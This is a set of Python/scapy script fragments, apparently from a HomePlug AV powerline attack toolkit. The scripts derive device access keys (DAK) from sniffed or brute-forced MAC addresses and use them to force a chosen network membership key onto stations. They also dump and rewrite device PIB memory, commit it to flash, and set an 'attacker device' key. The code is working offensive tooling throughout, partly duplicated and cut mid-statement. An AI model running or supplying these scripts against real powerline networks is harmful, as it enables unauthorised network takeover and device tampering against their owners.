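def setNMK(interface, mac, nmk, timeout=None):
    """Ask the HomePlug AV station at *mac* to adopt *nmk* as its NMK.

    A SetEncryptionKeyRequest carrying the new Network Membership Key is
    sent on *interface* and the single reply (if any) is inspected.

    Args:
        interface: name of the network interface to send on (scapy ``iface``).
        mac: destination MAC address of the station, as a string.
        nmk: the NMK to configure (the sibling scripts pass a 16-byte string).
        timeout: optional seconds to wait for a reply; ``None`` keeps the
            original behaviour of waiting without a limit.

    Returns:
        True if a SetEncryptionKeyConfirmation came back, False if no reply
        arrived or the reply carries no confirmation layer.
    """
    # Building packet.  DAK=0 is what the original passed; the sibling script
    # uses an explicit 16 zero-byte string for the same field -- TODO confirm
    # the scapy version in use accepts an int here.
    pkt = Ether(dst=mac) / HomePlugAV() / SetEncryptionKeyRequest(
        NMK=nmk,
        DestinationMAC=mac,
        EKS=1,
        PayloadEncKeySelect=0x0f,
        DAK=0,
    )
    # Sending packet and capturing answer
    ans = srp1(pkt, iface=interface, verbose=False, timeout=timeout)
    # srp1 returns None when nothing answered; the original dereferenced it
    # and failed with AttributeError instead of reporting failure.
    if ans is None:
        return False
    # Checking if operation succeeded
    return bool(ans.haslayer(SetEncryptionKeyConfirmation))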
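def checkAVLN(interface, mac):
    """Report whether the station at *mac* is a member of at least one AVLN.

    Sends a NetworkInformationRequest on *interface* and reads the
    LogicalNetworksNumber field of the confirmation that comes back.

    Args:
        interface: network interface to send on.
        mac: destination MAC address of the station.

    Returns:
        True if the station answered with a V1.0 or V1.1 network-info
        confirmation reporting more than zero logical networks, otherwise
        False (including when no answer arrived at all).
    """
    # Building packet
    pkt = Ether(dst=mac) / HomePlugAV() / NetworkInformationRequest()
    # Sending packet
    ans = srp1(pkt, iface=interface, verbose=False)
    # No reply: the original dereferenced None here.
    if ans is None:
        return False
    # Checking answer to determine if STA is member of an AVLN.  The original
    # accepted either confirmation version but always indexed the V1.0 layer,
    # which raises on a V1.1-only reply; read whichever layer is present.
    # assumes both confirmation classes expose LogicalNetworksNumber -- TODO confirm
    for layer in (NetworkInfoConfirmationV10, NetworkInfoConfirmationV11):
        if ans.haslayer(layer):
            return ans[layer].LogicalNetworksNumber > 0
    return False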
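def dump_all(src, dst, iface):
    """Read the whole PIB (module data) of the station at *dst* and return it.

    A first ReadModuleDataRequest fetches the header so the total size can be
    taken from ModulePIB.PIBLength; the PIB is then read again from offset 0
    in fixed-size chunks plus one final partial chunk.

    Args:
        src: source MAC address for the Ethernet header.
        dst: destination MAC address of the station.
        iface: network interface to send on.

    Returns:
        The concatenated ModuleData payloads in offset order (str on
        Python 2, bytes on Python 3).

    Raises:
        RuntimeError: if a request gets no reply (srp1 returned None); the
            original dereferenced None and failed with AttributeError.
    """
    length = 0x400
    etherhome = Ether(src=src, dst=dst) / HomePlugAV()

    def read_chunk(offset, size):
        # One ReadModuleDataRequest / reply round trip, returning the payload.
        req = etherhome / ReadModuleDataRequest(Offset=offset, Length=size)
        res = srp1(req, iface=iface)
        if res is None:
            raise RuntimeError(
                "no reply to ReadModuleDataRequest at offset 0x%x" % offset)
        return res.ModuleData

    # The first read only serves to learn the PIB length from its header.
    header = read_chunk(0, length)
    pib_len = ModulePIB(header, 0, length).PIBLength

    # Floor division: the original '/' is integer division on Python 2 only,
    # and range() below needs an int.
    nbreq = pib_len // length
    remainder = pib_len - nbreq * length
    chunks = [read_chunk(off, length) for off in range(0, nbreq * length, length)]
    # Final partial chunk.  Its offset is computed directly rather than from
    # the loop variable, which was unbound when the PIB fit in one chunk.
    # The original still issued a zero-length request when nothing remained.
    if remainder:
        chunks.append(read_chunk(nbreq * length, remainder))
    # b"".join keeps str on Python 2 and bytes on Python 3.
    return b"".join(chunks)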
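def rewrite_all(data_, dest, src, iface):
    """Write *data_* back as the module data of the station at *dest* and commit it to NVM.

    The data is sent in fixed-size WriteModuleDataRequest chunks followed by
    one final partial chunk, then a WriteModuleData2NVMRequest asks the
    station to persist it.

    Args:
        data_: the module data to write (str on Python 2 / bytes on 3).
        dest: destination MAC address of the station.
        src: source MAC address for the Ethernet header.
        iface: network interface to send on.

    Returns:
        True if the NVM-commit confirmation arrived with Status 0, else
        False (including when no confirmation arrived at all).
    """
    length = 0x400
    etherhome = Ether(src=src, dst=dest) / HomePlugAV()

    def write_chunk(offset, payload):
        # One WriteModuleDataRequest round trip; the per-chunk reply is not
        # inspected, matching the original.
        req = etherhome / WriteModuleDataRequest(Offset=offset, ModuleData=payload)
        srp1(req, iface=iface)

    # Floor division: '/' is integer division on Python 2 only, and range()
    # below needs an int.
    nbreq = len(data_) // length
    for i in range(0, nbreq * length, length):
        write_chunk(i, data_[i:i + length])
    # Tail chunk: offset computed directly, since the loop variable was
    # unbound when the data fit in a single chunk.  The original still sent
    # an empty write when the length was an exact multiple of the chunk size.
    tail_offset = nbreq * length
    if tail_offset < len(data_):
        write_chunk(tail_offset, data_[tail_offset:])

    # Write Data -> NVM
    res = srp1(etherhome / WriteModuleData2NVMRequest(), iface=iface)
    # No reply used to raise AttributeError; report it as a failed commit.
    if res is None or not res.haslayer(WriteModuleData2NVMConfirmation):
        return False
    return res[WriteModuleData2NVMConfirmation].Status == 0x0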
# NOTE(review): the statements up to the __main__ guard belong to a function
# whose definition starts before this part of the file (by the sniff() call
# below, presumably the appendindic callback); they are kept as they were,
# only reformatted.
if macad not in dictio.keys() and macad != "00:00:00:00:00:00":
    dictio[macad] = DAKgen(macad).generate()
    print("\t Found CCo: %s (DAK: %s)" % (macad, dictio[macad]))


if __name__ == "__main__":
    # Command-line handling: the interface to use and the source MAC to send with.
    usage = "usage: %prog [options] arg"
    parser = OptionParser(usage)
    parser.add_option(
        "-i", "--iface",
        dest="iface", default="eth0", metavar="INTERFACE",
        help="select an interface to Enable sniff mode and sniff indicates packets",
    )
    parser.add_option(
        "-s", "--source",
        dest="sourcemac", default="00:c4:ff:ee:00:00", metavar="SOURCEMARC",
        help="source MAC address to use",
    )
    options, args = parser.parse_args()

    # Ask the attached station to enable sniff mode (SnifferControl=1), as the
    # original comment describes.
    print("[+] Enabling sniff mode")
    pkt = Ether(src=options.sourcemac) / HomePlugAV() / SnifferRequest(SnifferControl=1)
    sendp(pkt, iface=options.iface)

    # Then hand every HomePlugAV frame to appendindic, which prints and
    # records the CCo addresses it finds.  No timeout: runs until interrupted.
    print("[+] Listening for CCo station...")
    sniff(prn=appendindic, lfilter=lambda frame: frame.haslayer(HomePlugAV))
# Command-line front end: interface, the known leading bytes of the target
# MAC addresses (presumably hex digits without separators, since the byte
# count below is len(arg)/2), the source MAC to send from and the NMK to set.
usage = "usage: %prog [options] arg"
parser = OptionParser(usage)
parser.add_option("-i", "--iface", dest="iface", default="eth0", help="select an interface to Enable sniff mode and sniff indicates packets", metavar="INTERFACE")
parser.add_option("-t", "--targets", dest="macaddress", default="", help="Targets MAC address bytes", metavar="MACBYTES")
parser.add_option("-s", "--source", dest="sourcemac", default="00:c4:ff:ee:00:00", help="source MAC address to use", metavar="SOURCEMARC")
parser.add_option("-k", "--key", dest="nmk", default="\x00"*16, help="NMK key to configure", metavar="NMK")
(options, args) = parser.parse_args()
arg = options.macaddress
# Every value of one byte as a hex string ('0'..'ff'); hex() does not zero-pad,
# which the inner loop below repairs.
_bytes = [hex(x)[2:] for x in (range(0x100))]
# One tuple per way of filling the bytes not fixed by --targets.  '/' is
# integer division on Python 2 only; repeat= would receive a float on Python 3.
products = itertools.product(_bytes, repeat=(6-len(arg)/2))
for x in products:
    # Left-pad single hex digits so each byte is exactly two characters.
    cmac = ''
    for y in range(len(x)):
        if len(x[y]) == 1:
            cmac += '0'+ x[y]
        else:
            cmac += x[y]
    newmac = arg + cmac
    # Candidate DAK for this MAC: DAKgen takes only the address, and PBKDF1
    # (DAK_SALT, 16 bytes, SHA-256) turns its output into the key material
    # the request carries.  Both helpers live outside this file -- assumes
    # PBKDF1 returns a hex string, since it is unhexlified below.
    keygen = DAKgen(newmac)
    DAKpass = keygen.generate()
    pbkdf1 = PBKDF1(DAKpass, DAK_SALT, 16, hashlib.sha256())
    # One SetEncryptionKeyRequest per candidate.  sendp collects no reply, so
    # the script cannot tell which candidate, if any, was accepted.
    pkt = Ether(src=options.sourcemac)/HomePlugAV()/SetEncryptionKeyRequest(NMK=options.nmk, EKS=1, DAK=binascii.unhexlify(pbkdf1))
    sendp(pkt, iface=options.iface)
# NOTE(review): the line below is the tail of a parser.add_option("-s", ...)
# call that starts before this part of the file; it is kept as it was.
default="00:c4:ff:ee:00:00", help="source MAC address to use", metavar="SOURCEMAC")
parser.add_option("-k", "--key", dest="nmk", default="\x00" * 16, help="NMK key to configure", metavar="NMK")
(options, args) = parser.parse_args()
# --targets gives the known leading bytes of the MAC addresses (presumably hex
# digits without separators, since the byte count below is len(arg)/2).
arg = options.macaddress
# Every value of one byte as a hex string ('0'..'ff'); hex() does not zero-pad,
# which the inner loop below repairs.
_bytes = [hex(x)[2:] for x in (range(0x100))]
# One tuple per way of filling the bytes not fixed by --targets.  '/' is
# integer division on Python 2 only; repeat= would receive a float on Python 3.
products = itertools.product(_bytes, repeat=(6 - len(arg) / 2))
for x in products:
    # Left-pad single hex digits so each byte is exactly two characters.
    cmac = ''
    for y in range(len(x)):
        if len(x[y]) == 1:
            cmac += '0' + x[y]
        else:
            cmac += x[y]
    newmac = arg + cmac
    # Candidate DAK for this MAC: DAKgen takes only the address, and PBKDF1
    # (DAK_SALT, 16 bytes, SHA-256) turns its output into the key material
    # the request carries.  Both helpers live outside this file -- assumes
    # PBKDF1 returns a hex string, since it is unhexlified below.
    keygen = DAKgen(newmac)
    DAKpass = keygen.generate()
    pbkdf1 = PBKDF1(DAKpass, DAK_SALT, 16, hashlib.sha256())
    # One SetEncryptionKeyRequest per candidate.  sendp collects no reply, so
    # the script cannot tell which candidate, if any, was accepted.
    pkt = Ether(src=options.sourcemac) / HomePlugAV() / SetEncryptionKeyRequest(NMK=options.nmk, EKS=1, DAK=binascii.unhexlify(pbkdf1))
    sendp(pkt, iface=options.iface)
def listen():
    """Capture HomePlugAV frames for five seconds, handing each to appendindic."""
    sniff(prn=appendindic, lfilter=lambda frame: frame.haslayer(HomePlugAV), timeout=5)


if __name__ == "__main__":
    # Command-line handling: the interface to use and the source MAC to send with.
    usage = "usage: %prog [options] arg"
    parser = OptionParser(usage)
    parser.add_option(
        "-i", "--iface",
        dest="iface", default="eth0", metavar="INTERFACE",
        help="select an interface to Enable sniff mode and sniff indicates packets",
    )
    parser.add_option(
        "-s", "--source",
        dest="sourcemac", default="00:c4:ff:ee:00:00", metavar="SOURCEMARC",
        help="source MAC address to use",
    )
    options, args = parser.parse_args()

    # The capture thread is started before the request goes out; the main
    # thread never joins it, so the process lingers until the 5 s sniff ends.
    tlisten = threading.Thread(target=listen)
    print("[+] Listening for confirmations...")
    tlisten.start()

    # A bare HomePlugAV header with no request layer is what the original
    # sends; whether stations treat it as a Get Device Type request is not
    # visible from this file -- TODO confirm.
    print("[+] Sending Get Device Type Requests")
    pkt = Ether(src=options.sourcemac) / HomePlugAV()
    sendp(pkt, iface=options.iface)
# NOTE(review): the line below is the tail of a parser.add_option(...) call
# for the --localdevice option that starts before this part of the file; it
# is kept as it was.
help="MAC address of your local attached PLC", metavar="LOCALDEVICE")
parser.add_option("-k", "--key", dest="nmk", default="\x00" * 16, help="NMK key to configure", metavar="NMK")
(options, args) = parser.parse_args()
if not options.localdevice:  # if localdevice is not given
    parser.error('Local Device MAC address not given')
# Set NMK to attacker device: the locally attached station named by
# --localdevice is told to adopt --key as its NMK.  The DAK field is sent as
# 16 zero bytes; why the local station accepts that is not visible here.
zeroDAK = "\x00" * 16
pkt = Ether(dst=options.localdevice) / HomePlugAV() / SetEncryptionKeyRequest(NMK=options.nmk, EKS=1, DAK=zeroDAK, DestinationMAC=options.localdevice, PayloadEncKeySelect=0x0f)
# Wait at most 5 s for the single reply; srp1 returns None on timeout.
ans = srp1(pkt, iface=options.iface, verbose=False, timeout=5)
if ans is None:
    print "Packet sent with no answer..."
    exit(1)
# ans[1] is the layer after Ethernet; the confirmation is looked for below it.
if ans[1].haslayer(SetEncryptionKeyConfirmation):
    print "Set NMK key with success!"
else:
    print "There was an error while setting the NMK. Is the localdevice wired to your computer?"